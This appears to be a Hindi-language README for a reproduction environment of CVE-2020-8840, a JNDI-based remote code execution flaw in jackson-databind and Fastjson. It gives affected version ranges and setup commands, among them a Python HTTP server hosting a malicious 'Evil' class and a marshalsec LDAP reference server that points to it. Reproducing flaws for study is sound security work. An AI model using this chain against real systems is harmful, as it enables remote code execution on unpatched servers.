
Jackson-databind रिमोट कोड निष्पादन भेद्यता (CVE-2020-8840) विश्लेषण और पुनरुत्पादन पर्यावरण कोड
Jackson-databind दूरस्थ कोड निष्पादन भेद्यता (CVE-2020-8840) विश्लेषण और पुनरुत्पादन पर्यावरण कोड।
परियोजना में शामिल हैं:
jackson-databind, Fastjson में पेलोडmarshalsec-0.0.3-SNAPSHOT-all.jarJackson-databind दूरस्थ कोड निष्पादन भेद्यता (CVE-2020-8840), हमलावर xbean-reflect शोषण श्रृंखला (org.apache.xbean.propertyeditor.JndiConverter) का उपयोग करके JNDI दूरस्थ क्लास लोडिंग को ट्रिगर कर सकते हैं और इस प्रकार दूरस्थ कोड निष्पादन प्राप्त कर सकते हैं।
यह भेद्यता jackson-databind और Fastjson के कुछ संस्करणों को भी प्रभावित करती है।
प्रभाव सीमा: 2.0.0 <= FasterXML jackson-databind <= 2.9.10.2

उदाहरण कोड में इंगित LDAP सेवा को स्वयं सेटअप करना होगा।
HTTP सेवा शुरू करें, दुर्भावनापूर्ण क्लास रखें (परियोजना में Evil.java क्लास शामिल है)
python -m http.server 2222

LDAP सेवा
Marshalsec टूल डाउनलोड करें, इसे jar में संकलित करें, LDAP सेवा शुरू करें, codebase पता सेट करें (दुर्भावनापूर्ण क्लास रखने वाला WebServer)।
सुविधा के लिए, डाउनलोड और संकलन छोड़ दिया गया है, परियोजना में marshalsec-0.0.3-SNAPSHOT-all.jar शामिल है (परियोजना कोड छोटा है, बड़े आकार का मुख्य कारण), JDK8 द्वारा संकलित।
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:2222/#Evil

प्रभाव सीमा: Fastjson <= 1.2.62
पुनरुत्पादन वातावरण ऊपर के समान है, स्वयं WebServer, LDAP सेवा सेटअप और प्रारंभ करें।
